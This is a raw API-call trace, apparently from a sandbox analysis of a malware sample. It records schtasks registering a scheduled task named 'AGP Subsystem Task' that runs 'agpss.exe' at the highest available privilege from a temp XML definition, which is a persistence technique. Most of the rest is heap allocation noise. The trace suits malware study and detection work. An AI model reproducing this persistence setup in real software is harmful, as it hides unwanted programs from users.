[0170.461] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.461] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.461] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.461] StrStrIW (lpFirst="|xml|", lpSrch="|xml|") returned="|xml|"
[0170.461] SetLastError (dwErrCode=0x0)
[0170.461] SetLastError (dwErrCode=0x0)
[0170.461] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.461] lstrlenW (lpString="-/") returned 2
[0170.461] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0170.461] SetLastError (dwErrCode=0x490)
[0170.461] SetLastError (dwErrCode=0x490)
[0170.461] SetLastError (dwErrCode=0x0)
[0170.461] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.461] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp"
[0170.461] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.462] _memicmp (_Buf1=0x4f4cf0, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.462] _memicmp (_Buf1=0x4f4d20, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.462] SetLastError (dwErrCode=0x7a)
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] lstrlenW (lpString="C") returned 1
[0170.462] SetLastError (dwErrCode=0x490)
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.462] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.462] GetProcessHeap () returned 0x4e0000
[0170.462] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x60) returned 0x4f6a28
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.462] SetLastError (dwErrCode=0x0)
[0170.462] GetProcessHeap () returned 0x4e0000
[0170.462] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x1fc) returned 0x4f6a90
[0170.463] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0170.573] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0170.623] CoCreateInstance (in: rclsid=0xeb230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xeb20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x13d250 | out: ppv=0x13d250*=0x173e00) returned 0x0
[0170.635] TaskScheduler:ITaskService:Connect (This=0x173e00, serverName=0x13d1c0*(varType=0x8, wReserved1=0x0, wReserved2=0xd234, wReserved3=0x13, varVal1=0x0, varVal2=0x13db10), user=0x13d1d0*(varType=0x0, wReserved1=0x13, wReserved2=0xd258, wReserved3=0x13, varVal1=0x75419cde, varVal2=0x13db10), domain=0x13d1e0*(varType=0x0, wReserved1=0x0, wReserved2=0x1ec, wReserved3=0x0, varVal1=0xe, varVal2=0x0), password=0x13d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x9c39, wReserved3=0x7541, varVal1=0x6c, varVal2=0x13dc90)) returned 0x0
[0170.642] TaskScheduler:IUnknown:AddRef (This=0x173e00) returned 0x2
[0170.642] TaskScheduler:ITaskService:GetFolder (in: This=0x173e00, Path=0x0, ppFolder=0x13d2f4 | out: ppFolder=0x13d2f4*=0x173e68) returned 0x0
[0170.643] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmp17.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x110
[0170.644] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x13cbe4 | out: lpFileSize=0x13cbe4*=1309) returned 1
[0170.644] ReadFile (in: hFile=0x110, lpBuffer=0x13cbec, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x13cbf4, lpOverlapped=0x0 | out: lpBuffer=0x13cbec*, lpNumberOfBytesRead=0x13cbf4*=0x2, lpOverlapped=0x0) returned 1
[0170.645] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0170.645] malloc (_Size=0x51e) returned 0x1724e8
[0170.645] ReadFile (in: hFile=0x110, lpBuffer=0x1724e8, nNumberOfBytesToRead=0x51e, lpNumberOfBytesRead=0x13cbf4, lpOverlapped=0x0 | out: lpBuffer=0x1724e8*, lpNumberOfBytesRead=0x13cbf4*=0x51d, lpOverlapped=0x0) returned 1
[0170.645] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x1724e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1310
[0170.645] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x1724e8, cbMultiByte=-1, lpWideCharStr=0x504fd4, cchWideChar=1310 | out: lpWideCharStr="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\"\r\n $(Arg0)\r\n \r\n \r\n") returned 1310
[0170.645] SysStringLen (param_1="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\"\r\n $(Arg0)\r\n \r\n \r\n") returned 0x51d
[0170.645] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\"\r\n $(Arg0)\r\n \r\n \r\n", pbstrResult=0x13cb94 | out: pbstrResult=0x13cb94) returned 0x0
[0170.646] free (_Block=0x1724e8)
[0170.646] CloseHandle (hObject=0x110) returned 1
[0170.647] lstrlenW (lpString="") returned 0
[0170.647] malloc (_Size=0xc) returned 0x173ea8
[0170.647] SysStringLen (param_1="") returned 0x0
[0170.647] free (_Block=0x173ea8)
[0170.647] lstrlenW (lpString="") returned 0
[0170.648] ITaskFolder:RegisterTask (in: This=0x173e68, Path="AGP Subsystem Task", XmlText="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe\"\r\n $(Arg0)\r\n \r\n \r\n", flags=6, UserId=0x13cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x4178, wReserved3=0x50, varVal1="", varVal2=0x504178), password=0x13cbe0*(varType=0x0, wReserved1=0x50, wReserved2=0x0, wReserved3=0x0, varVal1=0x13cc68, varVal2=0x76987526), LogonType=0, sddl=0x13cbf4*(varType=0x0, wReserved1=0x50, wReserved2=0x4178, wReserved3=0x50, varVal1=0x0, varVal2=0x0), ppTask=0x13cc54 | out: ppTask=0x13cc54*=0x173ed8) returned 0x0
[0170.761] GetProcessHeap () returned 0x4e0000
[0170.761] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5748
[0170.761] _memicmp (_Buf1=0x4f4c90, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.761] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x4f6728, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0170.761] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0170.761] GetProcessHeap () returned 0x4e0000
[0170.761] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x82) returned 0x504d58
[0170.761] _vsnwprintf (in: _Buffer=0x13cc60, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x13cc04 | out: _Buffer="SUCCESS: The scheduled task \"AGP Subsystem Task\" has successfully been created.\n") returned 80
[0170.761] _fileno (_File=0x754b2920) returned 1
[0170.761] _errno () returned 0x1707d8
[0170.761] _get_osfhandle (_FileHandle=1) returned 0x7
[0170.761] _errno () returned 0x1707d8
[0170.761] GetFileType (hFile=0x7) returned 0x2
[0170.762] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0170.762] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x13cbc8 | out: lpMode=0x13cbc8) returned 1
[0170.762] __iob_func () returned 0x754b2900
[0170.762] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0170.762] lstrlenW (lpString="SUCCESS: The scheduled task \"AGP Subsystem Task\" has successfully been created.\n") returned 80
[0170.763] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x13cc60*, nNumberOfCharsToWrite=0x50, lpNumberOfCharsWritten=0x13cbf0, lpReserved=0x0 | out: lpBuffer=0x13cc60*, lpNumberOfCharsWritten=0x13cbf0*=0x50) returned 1
[0170.763] IUnknown:Release (This=0x173ed8) returned 0x0
[0170.763] TaskScheduler:IUnknown:Release (This=0x173e68) returned 0x0
[0170.763] TaskScheduler:IUnknown:Release (This=0x173e00) returned 0x1
[0170.763] lstrlenW (lpString="") returned 0
[0170.763] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp") returned 47
[0170.764] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a90) returned 1
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6a90) returned 0x1fc
[0170.764] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a90 | out: hHeap=0x4e0000) returned 1
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a28) returned 1
[0170.764] GetProcessHeap () returned 0x4e0000
[0170.764] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6a28) returned 0x60
[0170.765] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6a28 | out: hHeap=0x4e0000) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53a8) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f53a8) returned 0x16
[0170.765] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53a8 | out: hHeap=0x4e0000) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ef060) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4ef060) returned 0x10
[0170.765] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ef060 | out: hHeap=0x4e0000) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53c8) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f53c8) returned 0x14
[0170.765] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f53c8 | out: hHeap=0x4e0000) returned 1
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.765] GetProcessHeap () returned 0x4e0000
[0170.766] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6680) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6680) returned 0xa0
[0170.766] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6680 | out: hHeap=0x4e0000) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c78) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4c78) returned 0x10
[0170.766] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c78 | out: hHeap=0x4e0000) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5288) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5288) returned 0x14
[0170.766] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5288 | out: hHeap=0x4e0000) returned 1
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.766] GetProcessHeap () returned 0x4e0000
[0170.767] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f69b8) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f69b8) returned 0x64
[0170.767] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f69b8 | out: hHeap=0x4e0000) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4d20) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4d20) returned 0x10
[0170.767] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4d20 | out: hHeap=0x4e0000) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5248) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5248) returned 0x14
[0170.767] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5248 | out: hHeap=0x4e0000) returned 1
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] GetProcessHeap () returned 0x4e0000
[0170.767] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4d08) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4d08) returned 0xc
[0170.768] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4d08 | out: hHeap=0x4e0000) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cf0) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4cf0) returned 0x10
[0170.768] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cf0 | out: hHeap=0x4e0000) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5228) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5228) returned 0x14
[0170.768] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5228 | out: hHeap=0x4e0000) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5a90) returned 1
[0170.768] GetProcessHeap () returned 0x4e0000
[0170.768] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5a90) returned 0x208
[0170.769] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5a90 | out: hHeap=0x4e0000) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c18) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4c18) returned 0x10
[0170.769] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c18 | out: hHeap=0x4e0000) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51e8) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f51e8) returned 0x14
[0170.769] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51e8 | out: hHeap=0x4e0000) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6728) returned 1
[0170.769] GetProcessHeap () returned 0x4e0000
[0170.769] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6728) returned 0x200
[0170.770] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6728 | out: hHeap=0x4e0000) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c90) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4c90) returned 0x10
[0170.770] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c90 | out: hHeap=0x4e0000) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5188) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5188) returned 0x14
[0170.770] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5188 | out: hHeap=0x4e0000) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5308) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5308) returned 0x14
[0170.770] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5308 | out: hHeap=0x4e0000) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cd8) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4cd8) returned 0x10
[0170.771] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cd8 | out: hHeap=0x4e0000) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50f0) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f50f0) returned 0x14
[0170.771] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50f0 | out: hHeap=0x4e0000) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5348) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5348) returned 0x16
[0170.771] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5348 | out: hHeap=0x4e0000) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4ca8) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4ca8) returned 0x10
[0170.771] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4ca8 | out: hHeap=0x4e0000) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50d0) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f50d0) returned 0x14
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50d0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fa0) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4fa0) returned 0x2
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fa0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fb0) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4fb0) returned 0x14
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fb0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fd0) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4fd0) returned 0x14
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fd0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4ff0) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4ff0) returned 0x14
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4ff0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5010) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5010) returned 0x14
[0170.773] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5010 | out: hHeap=0x4e0000) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52a8) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f52a8) returned 0x14
[0170.773] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52a8 | out: hHeap=0x4e0000) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52c8) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f52c8) returned 0x14
[0170.773] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52c8 | out: hHeap=0x4e0000) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6930) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6930) returned 0x30
[0170.774] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6930 | out: hHeap=0x4e0000) returned 1
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52e8) returned 1
[0170.774] GetProcessHeap () returned 0x4e0000
